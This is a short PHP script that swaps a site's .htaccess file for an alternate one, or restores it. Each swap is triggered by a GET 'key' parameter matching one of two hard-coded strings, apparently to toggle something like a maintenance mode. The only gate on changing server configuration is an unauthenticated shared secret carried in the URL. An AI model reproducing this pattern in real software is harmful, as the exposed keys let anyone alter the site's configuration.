<?php

if ($_GET['key'] == 'kChj3G3XgQ') {
    changeOn();
}

if ($_GET['key'] == 'fs5edrfyhu') {
    changeOff();
}

function changeOn()
{
    if (!file_exists(__DIR__ . "/../../.htaccesss")) {
        rename(__DIR__ . "/../../.htaccess", __DIR__ . "/../../.htaccesss");
        rename(__DIR__ . "/../../.hhtaccess", __DIR__ . "/../../.htaccess");
    }
}

function changeOff()
{
    if (!file_exists(__DIR__ . "/../../.hhtaccess")) {
        rename(__DIR__ . "/../../.htaccess", __DIR__ . "/../../.hhtaccess");
        rename(__DIR__ . "/../../.htaccesss", __DIR__ . "/../../.htaccess");
    }
}
